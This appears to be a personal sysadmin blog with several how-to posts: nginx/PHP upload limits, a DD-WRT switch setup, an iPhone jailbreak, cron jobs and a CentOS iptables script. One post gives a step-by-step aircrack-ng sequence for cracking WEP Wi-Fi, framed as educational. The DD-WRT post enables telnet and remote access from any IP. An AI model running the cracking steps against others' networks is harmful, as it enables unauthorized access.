Increasing PHP File Upload Size on nginx

I am running nginx + php-fpm. I was posting new products to my newly set up Magento website, however when I was uploading the product image I got the “HTTP Upload Error.” I searched only, but did not find the answer to my problem. It turns out that the “HTTP Upload Error” meant that you uploaded a file passed the maximum allowed by php-fpm.

To boost up the file limit, you can simply set to the following on:

# /etc/php.ini
upload_max_filesize= 5M
post_max_size = 10M #Usually double the "upload_max_filesize
max_input_time = 100 #This one set the time spend for the php service to get your file before it closes its connection with you. It is better to set a higher number if you upload large size files. I set mine to 100 seconds, it should be enough time for me to upload a 5MB file. 

# one of your nginx *.conf that contains your domain config
# /etc/nginx/conf.d/virtual.conf
# add the code below within server {}
client_max_body_size 5m;

Now simply reboot php-fpm and nginx to take effect:

service nginx restart
service php-fpm restart

 

Cracking my WEP with Backtrack/Kali

*This post is for educational purposes only! Please do not use it against other people!

When my friends asks me to setup their router for wi-fi connection, I have always make sure that the encryption is WPA with a strong password. The reason being is that WEP can be easily cracked using a linux tool called aircrack-ng.

We will be using a linux operating system called Kali (Backtrack). The time it takes to crack the password depends on your wi-fi signal. A strong wi-fi signal is recommended. You will

1)airmon-ng
2)airmon-ng start wlan0
3)airodump-ng mon0
4)airodump-ng -c (channel) -w (file name) –bssid (bssid) mon0
5)aireplay-ng -1 0 -a (bssid) mon0
6)aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0
7)aircrack-ng (filename)*.cap

Author: Jason Lin

Setting up DD-WRT router as a switch

This is a post at ddwrt forum by x1st. Original like here

 

5th time is a charm!

This time rather than following the wiki, i went with the intuitive method and now have a working solution.

The primary DHCP router is located at 192.168.1.254. I left the dd-wrt secondary router at 192.168.1.1 (I had done this on the original attempt but it still wouldn’t find the router.)

I suspect the settings in the GUI that are defaulted to off/disabled may have been an issue and I don’t remember if on the first time I had changed these.

Either way here is what I did in-case anyone else finds this post and is having the same problem.

This is for a wired connection to my primary router which handles DHCP. I also was wired into the router for the setup (don’t plug into the WAN port on the router for upstream connections, only use the PC/LAN ports for both upstream and then to the individual computers)

For reference: DD-WRT v24-sp2 (08/07/10) std (SVN revision 14896)

Setup -> Basic Setup
Connection Type – Disabled
Router IP – 192.168.1.1/255.255.255.0 (Same subnet as my primary router and not within the DHCP range. Primary router is a DSL/WAP modem/router in one and I can’t control the DHCP range which is 192.168.1.65-254)
Gateway & Local DNS – left empty
DHCP Server – Disabled (radio button)
DNSMasq options – Deselect both

SAVE

Setup -> Advanced Routing
Operating Mode – Router

SAVE

Wireless – configure this later after getting a working solution.

Services -> Services
DNSMasq – Disabled
Secure Shell – SSHd – enable
Telnet – Enable
traff Daemon – Disabled

SAVE

Security -> Firewall (I left everything default)
SPI Firewall – I left enabled

SAVE

Administration -> Management
Web Access
– Enable info Site – Enable
– Info Site Password Protection – Enabled
– Info Site MAC Masking – Enable

Remote Access
– Web GUI Management – Enable
– SSH Management- Enable
– Telnet Management – Enable
– Allow Any Remote IP – Enable

SAVE
APPLY SETTINGS

Hope that helps.

Jailbreak iPhone 5, iPhone 4S, iPhone 4, or iPhone 3GS on iOS 6.0 to iOS 6.1.2 using Evasi0n on Windows

Just got my iPhone 5 with firmware 6.0.2 with T-Mobile and I am excited to jailbreak it.

Here are the steps into how to jailbreak the iPhone 5, iPhone 4S, iPhone 4, or iPhone 3GS on iOS 6.0 to iOS 6.1.2 using Evasi0n on Windows.

  1. Download Evasi0n here for Windows.
  2. After you had downloaded the above, extract it and get these files within your extracted folder:

    Evasi0n Files within Folder
    Evasi0n Files within Folder
  3. Right click on the evasi0n icon and click on Run as Administrator then click on yes.
    03-17-13 2
  4. Now simply plug in your iPhone if you haven’t done so and close iTunes if it’s open. Evasi0n will automatically detect your iPhone and verifies if it jailbreakable for fool proof.
  5. Once plugged in, you can simply click Jailbreak to start the process.
    03-17-13 3
  6. At almost 75%, Evasi0n will tell you to unlock your iPhone and open up the Jailbreak app within your iPhone.
    03-17-13 6
  7. Done! (If you would like to support the Dev-Team, please click on “Support Us (Paypal)” within the software, they had done a great job.)
    03-17-13 7

Setting up Cron Jobs

Setting up cron job is a very useful feature offered by Linux if you want to automate commands to run at certain time.

# to list current cron jobs running by user.
crontab -l

# to create a new cron job
crontab -u user -e

*Note: I am currently running CentOS 6 and editing /etc/crontab did not work. Also putting a new line after your cron job is required.

How to Setting Up VPS/Dedicated Server for the First Time on CentOS 6.x LEMP Version

I just signed up for this great deal at ChicagoVPS.net for a 2GB RAM, 2TB/Month, 50GB space at $40 + Tax (NY) / Year. (Check the deal at SlickDeals.net, as of March 09)

I thought that the deal was great and wanted to give them a try.

ChicagoVPS was cheap, but it did not stand for what it was worth. I had many down time doing the month. I finally got a new dedicated server for my websites.

I am writing for blog for my own reference, I think the information I gathered over the internet will be helpful to you as well when you are setting up your VPS servers. Therefore I set up this blog on my unused web domain name. If there is any mistake or comments, please feel free to post your comment.

Requirements:

Updating

First time when you run the server, you should always update the system.

yum update

Firewall

Firewall is always and will be number one thing to do before starting anything, I had found a good script online that will set your firewall. (Need to find where I got it from to give credit)

Save the below iptables to iptables.sh. Please note that I had opened port 8080 for varnish tests. You may disable it by removing the line.

#!/bin/bash
# A sample firewall shell script 
IPT="/sbin/iptables"
SPAMLIST="blockedip"
SPAMDROPMSG="BLOCKED IP DROP"
SYSCTL="/sbin/sysctl"
BLOCKEDIPS="/root/scripts/blocked.ips.txt"

# Stop certain attacks
echo "Setting sysctl IPv4 settings..."
$SYSCTL net.ipv4.ip_forward=0
$SYSCTL net.ipv4.conf.all.send_redirects=0
$SYSCTL net.ipv4.conf.default.send_redirects=0
$SYSCTL net.ipv4.conf.all.accept_source_route=0
$SYSCTL net.ipv4.conf.all.accept_redirects=0
$SYSCTL net.ipv4.conf.all.secure_redirects=0
$SYSCTL net.ipv4.conf.all.log_martians=1
$SYSCTL net.ipv4.conf.default.accept_source_route=0
$SYSCTL net.ipv4.conf.default.accept_redirects=0
$SYSCTL net.ipv4.conf.default.secure_redirects=0
$SYSCTL net.ipv4.icmp_echo_ignore_broadcasts=1
#$SYSCTL net.ipv4.icmp_ignore_bogus_error_messages=1
$SYSCTL net.ipv4.tcp_syncookies=1
$SYSCTL net.ipv4.conf.all.rp_filter=1
$SYSCTL net.ipv4.conf.default.rp_filter=1
$SYSCTL kernel.exec-shield=1
$SYSCTL kernel.randomize_va_space=1

echo "Starting IPv4 Firewall..."
$IPT -F
$IPT -X
$IPT -t nat -F
$IPT -t nat -X
$IPT -t mangle -F
$IPT -t mangle -X

# interface connected to the Internet 
PUB_IF="eth0"

#Unlimited traffic for loopback
$IPT -A INPUT -i lo -j ACCEPT
$IPT -A OUTPUT -o lo -j ACCEPT

# DROP all incomming traffic
$IPT -P INPUT DROP
$IPT -P OUTPUT DROP
$IPT -P FORWARD DROP

# Block sync
$IPT -A INPUT -i ${PUB_IF} -p tcp ! --syn -m state --state NEW  -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "Drop Sync"
$IPT -A INPUT -i ${PUB_IF} -p tcp ! --syn -m state --state NEW -j DROP

# Block Fragments
$IPT -A INPUT -i ${PUB_IF} -f  -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "Fragments Packets"
$IPT -A INPUT -i ${PUB_IF} -f -j DROP

# Block bad stuff
$IPT  -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL FIN,URG,PSH -j DROP
$IPT  -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL ALL -j DROP

$IPT  -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL NONE -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "NULL Packets"
$IPT  -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL NONE -j DROP # NULL packets

$IPT  -A INPUT -i ${PUB_IF} -p tcp --tcp-flags SYN,RST SYN,RST -j DROP

$IPT  -A INPUT -i ${PUB_IF} -p tcp --tcp-flags SYN,FIN SYN,FIN -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "XMAS Packets"
$IPT  -A INPUT -i ${PUB_IF} -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP #XMAS

$IPT  -A INPUT -i ${PUB_IF} -p tcp --tcp-flags FIN,ACK FIN -m limit --limit 5/m --limit-burst 7 -j LOG --log-level 4 --log-prefix "Fin Packets Scan"
$IPT  -A INPUT -i ${PUB_IF} -p tcp --tcp-flags FIN,ACK FIN -j DROP # FIN packet scans

$IPT  -A INPUT -i ${PUB_IF} -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -j DROP

# Allow full outgoing connection but no incomming stuff
$IPT -A INPUT -i ${PUB_IF} -m state --state ESTABLISHED,RELATED -j ACCEPT
$IPT -A OUTPUT -o ${PUB_IF} -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT

# Allow ssh
$IPT -A INPUT -i ${PUB_IF} -p tcp --destination-port 22 -j ACCEPT

# Allow http / https (open port 80 / 443)
$IPT -A INPUT -i ${PUB_IF} -p tcp --destination-port 80 -j ACCEPT
$IPT -A INPUT -i ${PUB_IF} -p tcp --destination-port 443 -j ACCEPT
$IPT -A INPUT -i ${PUB_IF} -p tcp --destination-port 8080 -j ACCEPT

# allow incomming ICMP ping pong stuff
$IPT -A INPUT -i ${PUB_IF} -p icmp --icmp-type 8 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
#$IPT -A OUTPUT -o ${PUB_IF} -p icmp --icmp-type 0 -m state --state ESTABLISHED,RELATED -j ACCEPT

# Allow port 53 tcp/udp (DNS Server)
#$IPT -A INPUT -i ${PUB_IF} -p udp --dport 53 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
##$IPT -A OUTPUT -o ${PUB_IF} -p udp --sport 53 -m state --state ESTABLISHED,RELATED -j ACCEPT

#$IPT -A INPUT -i ${PUB_IF} -p tcp --destination-port 53 -m state --state NEW,ESTABLISHED,RELATED  -j ACCEPT
##$IPT -A OUTPUT -o ${PUB_IF} -p tcp --sport 53 -m state --state ESTABLISHED,RELATED -j ACCEPT

# Open port 110 (pop3) / 143
#$IPT -A INPUT -i ${PUB_IF} -p tcp --destination-port 110 -j ACCEPT
#$IPT -A INPUT -i ${PUB_IF} -p tcp --destination-port 143 -j ACCEPT

##### Add your rules below ######
#
# 
##### END your rules ############

# Do not log smb/windows sharing packets - too much logging
$IPT -A INPUT -p tcp -i ${PUB_IF} --dport 137:139 -j REJECT
$IPT -A INPUT -p udp -i ${PUB_IF} --dport 137:139 -j REJECT

# log everything else and drop
$IPT -A INPUT -j LOG
$IPT -A FORWARD -j LOG
$IPT -A INPUT -j DROP

exit 0

Saving the iptables for next reboots

iptables-save

Backing up

What every you are on VPS or dedicated with managed or unmanaged hosting, you should always backup and backup and backup your backups. Hey, things happen and I learned that from buying cheap hosting at ChicagoVPS (move away from them).

Click here to check the “How to Backup to Raspberry Pi

Nginx, PHP, and mySQL – LEMP Web Server

 

Security

Skipfish

yum install skipfish -y (More info about skipfish will be posted)